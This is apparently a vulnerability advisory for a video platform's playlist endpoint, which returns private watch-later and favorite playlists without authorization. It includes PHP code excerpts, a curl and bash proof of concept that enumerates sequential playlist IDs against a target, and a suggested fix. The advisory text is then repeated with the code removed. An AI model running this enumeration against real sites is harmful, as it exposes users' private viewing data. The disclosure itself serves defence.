Summary
The objects/playlistsVideos.json.php endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including watch_later and favorite types) are correctly hidden from listing endpoints via playlistsFromUser.json.php, but their contents are directly accessible through this endpoint by providing the sequential integer playlists_id parameter.
Details
The endpoint at objects/playlistsVideos.json.php accepts a playlists_id parameter and directly calls PlayList::getVideosFromPlaylist() with no ownership or visibility validation:
// objects/playlistsVideos.json.php:24-28
if (empty($_REQUEST['playlists_id'])) {
die('Play List can not be empty');
}
require_once './playlist.php';
$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);
The getVideosFromPlaylist() method at objects/playlist.php:588 performs a SQL query joining playlists_has_videos, videos, and users tables with no authorization filter:
// objects/playlist.php:592-597
$sql = "SELECT v.*, p.*,v.created as cre, p.`order` as video_order "
. " FROM playlists_has_videos p "
. " LEFT JOIN videos as v ON videos_id = v.id "
. " LEFT JOIN users u ON u.id = v.users_id "
. " WHERE playlists_id = ? AND v.status != 'i' ";
In contrast, the listing endpoint playlistsFromUser.json.php correctly enforces visibility at lines 23-27:
// objects/playlistsFromUser.json.php:23-27
$publicOnly = true;
if (User::isLogged() && (User::getId() == $requestedUserId || User::isAdmin())) {
$publicOnly = false;
}
$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);
This creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The .htaccess rewrite at line 356 maps the clean URL playListsVideos.json to this endpoint.
PoC
Step 1: Enumerate playlist contents without authentication
# No cookies or auth headers needed. Increment playlists_id to enumerate.
curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=1" | python3 -m json.tool
Expected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.
Step 2: Enumerate private playlists (watch_later, favorite)
# Iterate through sequential IDs to find private playlists
for i in $(seq 1 50); do
result=$(curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i")
count=$(echo "$result" | python3 -c "import sys,json; print(len(json.load(sys.stdin)))" 2>/dev/null)
if [ "$count" != "0" ] && [ -n "$count" ]; then
echo "Playlist $i: $count videos"
fi
done
Step 3: Confirm the listing endpoint correctly hides private playlists
# This correctly returns only public playlists for user 1
curl -s "http://TARGET/objects/playlistsFromUser.json.php?users_id=1" | python3 -m json.tool
# Compare: playlistsVideos.json.php returns contents of ALL playlists including private ones
Impact
An unauthenticated attacker can:
- Enumerate all users' watch history by accessing
watch_later playlist contents
- Enumerate all users' favorites by accessing
favorite playlist contents
- Access unlisted/private custom playlists that were intentionally hidden from public view
- Harvest video metadata including filenames, URLs, user information, and comments for videos in private playlists
This is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.
Recommended Fix
Add authorization checks to objects/playlistsVideos.json.php before returning playlist contents:
// objects/playlistsVideos.json.php — add after line 27, before getVideosFromPlaylist()
require_once $global['systemRootPath'] . 'plugin/PlayLists/PlayLists.php';
$pl = new PlayList($_REQUEST['playlists_id']);
$plStatus = $pl->getStatus();
// Public playlists are accessible to everyone
if ($plStatus !== 'public') {
// Private, unlisted, watch_later, and favorite playlists require ownership or admin
if (!User::isLogged() || (User::getId() != $pl->getUsers_id() && !User::isAdmin())) {
header('HTTP/1.1 403 Forbidden');
die(json_encode(['error' => 'You do not have permission to view this playlist']));
}
}
$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);
Summary
The
objects/playlistsVideos.json.phpendpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (includingwatch_laterandfavoritetypes) are correctly hidden from listing endpoints viaplaylistsFromUser.json.php, but their contents are directly accessible through this endpoint by providing the sequential integerplaylists_idparameter.Details
The endpoint at
objects/playlistsVideos.json.phpaccepts aplaylists_idparameter and directly callsPlayList::getVideosFromPlaylist()with no ownership or visibility validation:The
getVideosFromPlaylist()method atobjects/playlist.php:588performs a SQL query joiningplaylists_has_videos,videos, anduserstables with no authorization filter:In contrast, the listing endpoint
playlistsFromUser.json.phpcorrectly enforces visibility at lines 23-27:This creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The
.htaccessrewrite at line 356 maps the clean URLplayListsVideos.jsonto this endpoint.PoC
Step 1: Enumerate playlist contents without authentication
Expected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.
Step 2: Enumerate private playlists (watch_later, favorite)
Step 3: Confirm the listing endpoint correctly hides private playlists
Impact
An unauthenticated attacker can:
watch_laterplaylist contentsfavoriteplaylist contentsThis is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.
Recommended Fix
Add authorization checks to
objects/playlistsVideos.json.phpbefore returning playlist contents: